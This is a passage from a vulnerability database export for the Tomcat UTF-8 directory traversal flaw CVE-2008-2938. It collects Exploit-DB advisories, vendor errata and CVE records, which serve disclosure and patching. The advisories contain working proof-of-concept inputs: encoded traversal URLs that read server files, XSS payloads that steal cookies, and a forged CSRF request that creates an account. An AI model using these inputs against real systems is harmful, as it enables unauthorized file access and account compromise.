http://www.securenetwork.it/pgpkeys/Secure%20Network.asc\r\nPhone: +39 02 24 12 67 88\r\n\r\n-- \r\nClaudio Criscione\r\n\r\nSecure Network S.r.l.\r\nVia Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia\r\nTel: +39 02.24126788 Mob: +39 392 3389178\r\nemail: c.criscione@securenetwork.it\r\nweb: www.securenetwork.it\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-12603", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Originally reported as a Tomcat vulnerability the root cause of this issue is that the JVM does not correctly decode UTF-8 encoded URLs to UTF-8.\n\nVulnerability Type: File Disclosure", "cvss3": {}, "published": "2012-02-01T00:00:00", "type": "dsquare", "title": "Apache Tomcat File Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2013-04-02T00:00:00", "id": "E-197", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2022-08-16T09:31:21", "description": "", "cvss3": {}, "published": "2008-08-11T00:00:00", "type": "exploitdb", "title": "Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2008-2938", "CVE-2008-2938"], "modified": "2008-08-11T00:00:00", "id": "EDB-ID:6229", "href": "https://www.exploit-db.com/exploits/6229", "sourceData": "Title: Apache Tomcat Directory Traversal Vulnerability\r\nAuthor: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)\r\nSeverity: High\r\nImpact: Remote File Disclosure\r\nVulnerable Version: prior to 6.0.18\r\nSolution:\r\n - Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)\r\n - Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability.\r\n - Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix until next release.\r\nReferences:\r\n - http://tomcat.apache.org/security.html\r\n - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938\r\nHistory:\r\n - 07.17.2008: Initiate notify (To Apache Security Team)\r\n - 08.02.2008: Responsed this problem fixed and released new version\r\n - 08.05.2008: Notify disclosure (To Apache Tomcat Security Team)\r\n - 08.10.2008: Responsed with some suggestions.\r\n\r\nDescription\r\nAs Apache Security Team, this problem occurs because of JAVA side.\r\nIf your context.xml or server.xml allows 'allowLinking'and 'URIencoding' as\r\n'UTF-8', an attacker can obtain your important system files.(e.g. /etc/passwd)\r\n\r\nExploit\r\nIf your webroot directory has three depth(e.g /usr/local/wwwroot), An\r\nattacker can access arbitrary files as below. (Proof-of-concept)\r\n\r\nhttp://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar\r\n\r\n# milw0rm.com [2008-08-11]", "sourceHref": "https://www.exploit-db.com/download/6229", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-15T23:26:47", "description": "", "cvss3": {}, "published": "2009-11-07T00:00:00", "type": "exploitdb", "title": "toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2009-4849", "CVE-2006-3835", "CVE-2008-2938"], "modified": "2009-11-07T00:00:00", "id": "EDB-ID:10085", "href": "https://www.exploit-db.com/exploits/10085", "sourceData": "&redirectSecure Network - Security Research Advisory\r\n\r\nVuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities\r\nSystems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882\r\nSystems not affected: --\r\nSeverity: High\r\nLocal/Remote: Remote\r\nVendor URL: http://www.toutvirtual.com\r\nAuthor(s): Alberto Trivero (a.trivero (at) securenetwork (dot) it [email concealed]) \r\nClaudio Criscione (c.criscione (at) securenetwork (dot) it [email concealed])\r\nVendor disclosure: 02/07/2009\r\nVendor acknowledged: 16/07/2009\r\nVendor patch release: notified us on 06/11/2009\r\nPublic disclosure: 07/11/2009\r\nAdvisory number: SN-2009-02\r\nAdvisory URL: http://www.securenetwork.it/advisories/sn-2009-02.txt\r\n\r\n*** SUMMARY ***\r\n\r\nToutVirtual's VirtualIQ Pro is specifically designed for IT administrators \r\nresponsible for managing virtual platforms. VirtualIQ Pro provides\r\nVisibility, Analytics and policy-based Optimization - all from one single\r\nconsole. VirtualIQ Pro is hypervisor-agnostic supporting both Type I and Type \r\nII hypervisors. VirtualIQ Pro can be used to visualize, analyze and \r\noptimize your choice of virtualization platform - Citrix, Microsoft,\r\nNovell, Oracle and/or VMware.\r\n\r\nMultiple vulnerabilities has been found which a allow an attacker to conduct \r\nvarious XSS and CSRF attack, and other attacks due to the use \r\nof an old an not hardened version of the web server.\r\n\r\n*** VULNERABILITY DETAILS ***\r\n\r\n(a) Cross-site scripting (XSS)\r\n\r\nDue to an improper sanitization of user's input, multiple XSS attacks \r\n(reflective and stored) are possible.\r\nReflective PoCs:\r\n\r\nhttp://server:9080/tvserver/server/user/setPermissions.jsp?userId=1\"><sc\r\nript>alert(1)</script>&resultResourceIds=111-222-1933email (at) address (dot) t [email concealed]\r\nst\r\n\r\nhttp://server:9080/tvserver/server/user/addDepartment.jsp?addNewDept=0&a\r\nmp;deptName=%22;alert(1);//&deptId=1&deptDesc=asd\r\n\r\nhttp://server:9080/tvserver/server/inventory/inventoryTabs.jsp?ID=1;aler\r\nt(1);//\r\n\r\nhttp://server:9080/tvserver/reports/virtualIQAdminReports.do?command=get\r\nFilter&reportName=%22%3E%3Cscript%3Ealert(1)%3C/script%3E\r\n\r\nStored XSS attacks can be triggered in the \"Middle Name\" parameter in the \r\n\"Edit Profile\" page with an HTTP request like the following:\r\n\r\nPOST /tvserver/user/user.do?command=save&userId=1 HTTP/1.1\r\nHost: server:9080\r\nCookies: JSESSIONID=[...]\r\n\r\nuserName=IQMANAGER&firstName=IQ&middleName=asd'; \r\nalert(document.cookie);//&lastName=MANAGER&email=user%40domain.it&passwo\r\nrd=********&retypePassword=********&redirect=null&passwordModifed=false&\r\nisReportUser=false&roleId=1&supervisorId=1&departmentId=1&locationId=1\r\n\r\n(b) Cross-site request forgery (CSRF)\r\n\r\nAn attacker can perform different types of CSRF attacks against a logged user. \r\nHe can, for example, shutdown, start or restart an arbitrary\r\nvirtual machine, schedule new activities and so on.\r\n\r\nThe following HTTP request, if forged by the attacker and executed by the \r\nvictim while logged on VirtualIQ, creates an arbitrary user:\r\n\r\nPOST /tvserver/user/user.do?command=save&userId= HTTP/1.1\r\nHost: server:9080\r\nCookie: JSESSIONID=[...]\r\n\r\nuserName=asd1&firstName=asd2&middleName=asd3&lastName=asd4&email=asd5%40\r\nasd.com&password=asd6&retypePassword=asd6=null&passwordModifed=\r\nfalse&isReportUser=false&roleId=1&supervisorId=1&departmentId=1&location\r\nId=1\r\n\r\n(c) Web server vulnerabilities\r\n\r\nVirtualIQ runs on top of an old version of Apache Tomcat: 5.5.9, for which \r\nmultiple public vulnerabilities have been released. As a \r\nPoC, a directory traversal attack (CVE-2008-2938) \r\ncan be performed as:\r\n\r\nhttp://server:9080/tvserver/server/%C0%AE%C0%AE/WEB-INF/web.xml\r\n\r\nListing of an arbitrary directory (CVE-2006-3835) can also be obtained with \r\nthe following PoC:\r\n\r\nhttp://192.168.229.85:9080/tvserver/server/;index.jsp\r\n\r\n(d) Information Leakage\r\n\r\nTomcat status page should be disabled or restricted, being accessible at:\r\n\r\nhttp://status:9080/status\r\n\r\nUsername and password to access a VM through SSH are also available in clear \r\ntext in the configuration page. \r\nSince an XSS vulnerability can also be triggered in the same page, an attacker \r\nwould also be able to easily capture the full credentials to access \r\nthe VM with a specially crafted XSS payload.\r\n\r\n(e) Remote code execution\r\n\r\nJBoss JMX Management Console is exposed and can be used by remote attackers to \r\nexecute arbitrary commands on the system:\r\n\r\nhttp://server:9080/jmx-console/\r\n\r\nJBoss Web Console is exposed as well and can be used by remote attackers to \r\nexecute any command on the system:\r\n\r\nhttp://server:9080/web-console/\r\n\r\n*** EXPLOIT ***\r\n\r\nAttackers may exploit these issues through a common browser as explained \r\nabove.\r\n\r\n*** FIX INFORMATION ***\r\n\r\nUpgrade to the latest version, at the moment 3.5 build 10.14.2009\r\n\r\n*** WORKAROUNDS ***\r\n\r\n--\r\n\r\n*********************\r\n*** LEGAL NOTICES ***\r\n*********************\r\n\r\nSecure Network (www.securenetwork.it) is an information security company, \r\nwhich provides consulting and training services, and engages in security \r\nresearch and development.\r\n\r\nWe are committed to open, full disclosure of vulnerabilities, cooperating\r\nwhenever possible with software developers for properly handling disclosure.\r\n\r\nThis advisory is copyright 2009 Secure Network S.r.l. Permission is \r\nhereby granted for the redistribution of this alert, provided that it is\r\nnot altered except by reformatting it, and that due credit is given. It \r\nmay not be edited in any way without the express consent of Secure Network \r\nS.r.l. Permission is explicitly given for insertion in vulnerability \r\ndatabases and similars, provided that due credit is given to Secure Network.\r\n\r\nThe information in the advisory is believed to be accurate at the time of \r\npublishing based on currently available information. This information is\r\nprovided as-is, as a free service to the community by Secure Network \r\nresearch staff. There are no warranties with regard to this information. \r\nSecure Network does not accept any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n\r\nIf you have any comments or inquiries, or any issue with what is reported \r\nin this advisory, please inform us as soon as possible.\r\n\r\nE-mail: securenetwork (at) securenetwork (dot) it [email concealed]\r\nGPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc\r\nPhone: +39 02 24 12 67 88\r\n\r\n-- \r\nClaudio Criscione\r\n\r\nSecure Network S.r.l.\r\nVia Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia\r\nTel: +39 02.24126788 Mob: +39 392 3389178\r\nemail: c.criscione (at) securenetwork (dot) it [email concealed]\r\nweb: www.securenetwork.it", "sourceHref": "https://www.exploit-db.com/download/10085", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:41:53", "description": "Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37,\n5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8\nare enabled, allows remote attackers to read arbitrary files via encoded\ndirectory traversal sequences in the URI, a different vulnerability than\nCVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected,\nbut the vendor advisory lists 6.0.16 as the last affected version.\n\n#### Bugs\n\n * <http://launchpad.net/bugs/270553>\n", "cvss3": {}, "published": "2008-08-13T00:00:00", "type": "ubuntucve", "title": "CVE-2008-2938", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2370", "CVE-2008-2938"], "modified": "2008-08-13T00:00:00", "id": "UB:CVE-2008-2938", "href": "https://ubuntu.com/security/CVE-2008-2938", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T12:24:18", "description": "Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.", "cvss3": {}, "published": "2008-08-13T00:41:00", "type": "cve", "title": "CVE-2008-2938", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2370", "CVE-2008-2938"], "modified": "2022-02-03T19:45:00", "cpe": ["cpe:/a:apache:tomcat:4.1.37", "cpe:/a:apache:tomcat:5.5.26", "cpe:/a:apache:tomcat:6.0.16"], "id": "CVE-2008-2938", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2938", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:apache:tomcat:6.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:5.5.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:4.1.37:*:*:*:*:*:*:*"]}], "redhat": [{"lastseen": "2021-10-21T04:43:37", "description": "JBoss Web Server (jbossweb) is an enterprise ready web server designed for\nmedium and large applications, is based on Apache Tomcat, and is embedded\ninto JBoss Application Server. It provides organizations with a single\ndeployment platform for JavaServer Pages (JSP) and Java Servlet\ntechnologies, Microsoft\u00ae .NET, PHP, and CGI.\n\nA traversal vulnerability was discovered when using a RequestDispatcher\nin combination with a servlet or JSP. A remote attacker could utilize a\nspecially-crafted request parameter to access protected web resources.\n(CVE-2008-2370)\n\nAn additional traversal vulnerability was discovered when the\n\"allowLinking\" and \"URIencoding\" settings were activated. A remote attacker\ncould use a UTF-8-encoded request to extend their privileges and obtain\nlocal files accessible to the jbossweb process. (CVE-2008-2938)\n\nUsers of jbossweb should upgrade to this updated package, which contains\nbackported patches to resolve these issues.", "cvss3": {}, "published": "2008-09-22T00:00:00", "type": "redhat", "title": "(RHSA-2008:0877) Important: jbossweb security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1232", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2016-04-04T14:31:14", "id": "RHSA-2008:0877", "href": "https://access.redhat.com/errata/RHSA-2008:0877", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-21T04:47:00", "description": "Apache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies.\n\nA cross-site scripting vulnerability was discovered in the\nHttpServletResponse.sendError() method. A remote attacker could inject\narbitrary web script or HTML via forged HTTP headers. (CVE-2008-1232)\n\nAn additional cross-site scripting vulnerability was discovered in the host\nmanager application. A remote attacker could inject arbitrary web script or\nHTML via the hostname parameter. (CVE-2008-1947)\n\nA traversal vulnerability was discovered when using a RequestDispatcher\nin combination with a servlet or JSP. A remote attacker could utilize a\nspecially-crafted request parameter to access protected web resources.\n(CVE-2008-2370)\n\nAn additional traversal vulnerability was discovered when the\n\"allowLinking\" and \"URIencoding\" settings were activated. A remote attacker\ncould use a UTF-8-encoded request to extend their privileges and obtain\nlocal files accessible to the Tomcat process. (CVE-2008-2938)\n\nUsers of tomcat should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "cvss3": {}, "published": "2008-08-27T00:00:00", "type": "redhat", "title": "(RHSA-2008:0648) Important: tomcat security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2017-09-08T08:11:04", "id": "RHSA-2008:0648", "href": "https://access.redhat.com/errata/RHSA-2008:0648", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-19T20:36:06", "description": "Apache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies.\n\nA cross-site scripting vulnerability was discovered in the\nHttpServletResponse.sendError() method. A remote attacker could inject\narbitrary web script or HTML via forged HTTP headers. (CVE-2008-1232)\n\nAn additional cross-site scripting vulnerability was discovered in the host\nmanager application. A remote attacker could inject arbitrary web script or\nHTML via the hostname parameter. (CVE-2008-1947)\n\nA traversal vulnerability was discovered when using a RequestDispatcher\nin combination with a servlet or JSP. A remote attacker could utilize a\nspecially-crafted request parameter to access protected web resources.\n(CVE-2008-2370)\n\nAn additional traversal vulnerability was discovered when the\n\"allowLinking\" and \"URIencoding\" settings were activated. A remote attacker\ncould use a UTF-8-encoded request to extend their privileges and obtain\nlocal files accessible to the Tomcat process. (CVE-2008-2938)\n\nUsers of tomcat should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "cvss3": {}, "published": "2008-10-02T00:00:00", "type": "redhat", "title": "(RHSA-2008:0864) Important: tomcat security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2019-03-22T19:44:18", "id": "RHSA-2008:0864", "href": "https://access.redhat.com/errata/RHSA-2008:0864", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-19T20:35:45", "description": "This update corrects several security vulnerabilities in the Tomcat\ncomponent shipped as part of Red Hat Network Satellite Server. In a\ntypical operating environment, Tomcat is not exposed to users\nof Satellite Server in a vulnerable manner. These security updates will\nreduce risk in unique Satellite Server environments.\n\nMultiple flaws were fixed in the Apache Tomcat package. (CVE-2008-1232,\nCVE-2008-1947, CVE-2008-2370, CVE-2008-2938, CVE-2008-3271)\n\nUsers of Red Hat Network Satellite Server 5.0 or 5.1 are advised to update\nto these Tomcat packages which resolve these issues.", "cvss3": {}, "published": "2008-12-08T00:00:00", "type": "redhat", "title": "(RHSA-2008:1007) Low: tomcat security update for Red Hat Network Satellite Server", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938", "CVE-2008-3271"], "modified": "2019-03-22T19:44:40", "id": "RHSA-2008:1007", "href": "https://access.redhat.com/errata/RHSA-2008:1007", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-19T20:39:49", "description": "Apache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies.\n\nThe default security policy in the JULI logging component did not restrict\naccess permissions to files. This could be misused by untrusted web\napplications to access and write arbitrary files in the context of the\nTomcat process. (CVE-2007-5342)\n\nA directory traversal vulnerability was discovered in the Apache Tomcat\nwebdav servlet. Under certain configurations, this allowed remote,\nauthenticated users to read files accessible to the local Tomcat process.\n(CVE-2007-5461)\n\nA cross-site scripting vulnerability was discovered in the\nHttpServletResponse.sendError() method. A remote attacker could inject\narbitrary web script or HTML via forged HTTP headers. (CVE-2008-1232)\n\nAn additional cross-site scripting vulnerability was discovered in the host\nmanager application. A remote attacker could inject arbitrary web script or\nHTML via the hostname parameter. (CVE-2008-1947)\n\nA traversal vulnerability was discovered when using a RequestDispatcher\nin combination with a servlet or JSP. A remote attacker could utilize a\nspecially-crafted request parameter to access protected web resources.\n(CVE-2008-2370)\n\nAn additional traversal vulnerability was discovered when the\n\"allowLinking\" and \"URIencoding\" settings were activated. A remote attacker\ncould use a UTF-8-encoded request to extend their privileges and obtain\nlocal files accessible to the Tomcat process. (CVE-2008-2938)\n\nUsers of tomcat should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "cvss3": {}, "published": "2008-10-02T00:00:00", "type": "redhat", "title": "(RHSA-2008:0862) Important: tomcat security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-5342", "CVE-2007-5461", "CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2019-03-22T19:44:27", "id": "RHSA-2008:0862", "href": "https://access.redhat.com/errata/RHSA-2008:0862", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "description": "Tomcat is the servlet container that is used in the official Reference Implementation for the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed by Sun under the Java Community Process. Tomcat is developed in an open and participatory environment and released under the Apache Software License. Tomcat is intended to be a collaboration of the best-of-breed developers from around the world. We invite you to participate in this open development project. To learn more about getting involved, click here. ", "cvss3": {}, "published": "2008-09-16T23:25:10", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: tomcat5-5.5.27-0jpp.2.fc9", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2008-09-16T23:25:10", "id": "FEDORA:62EF6208DAC", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/UA4FGY6E5PIMSQAC4MDXMJYXTLYVMWXQ/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:49", "description": "Tomcat is the servlet container that is used in the official Reference Implementation for the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed by Sun under the Java Community Process. Tomcat is developed in an open and participatory environment and released under the Apache Software License version 2.0. Tomcat is intended to be a collaboration of the best-of-breed developers from around the world. ", "cvss3": {}, "published": "2008-09-11T17:17:43", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: tomcat6-6.0.18-1.1.fc9", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2008-09-11T17:17:43", "id": "FEDORA:A50D42E031E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4OOBSLKFJN6UWSFCA7KGICUKMMOVOGJ6/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:49", "description": "Tomcat is the servlet container that is used in the official Reference Implementation for the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed by Sun under the Java Community Process. Tomcat is developed in an open and participatory environment and released under the Apache Software License. Tomcat is intended to be a collaboration of the best-of-breed developers from around the world. We invite you to participate in this open development project. To learn more about getting involved, click here. ", "cvss3": {}, "published": "2008-09-16T23:28:35", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: tomcat5-5.5.27-0jpp.2.fc8", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1355", "CVE-2007-1358", "CVE-2007-2449", "CVE-2007-2450", "CVE-2007-3382", "CVE-2007-3385", "CVE-2007-3386", "CVE-2007-5333", "CVE-2007-5342", "CVE-2007-5461", "CVE-2007-6286", "CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2008-09-16T23:28:35", "id": "FEDORA:EC5A9208DCA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/SO63GDLSQW6JBBWPBCHSDUXPOGHO63Y2/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "atlassian": [{"lastseen": "2021-06-08T18:52:17", "description": "We should bundle the latest version of Tomcat with standalone to pick up some fixes including the security vulnerability detailed at:\r\n\r\n* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3382\r\n* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3385", "cvss3": {}, "published": "2008-01-15T04:23:59", "type": "atlassian", "title": "Upgrade standalone Tomcat to 5.5.25", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": 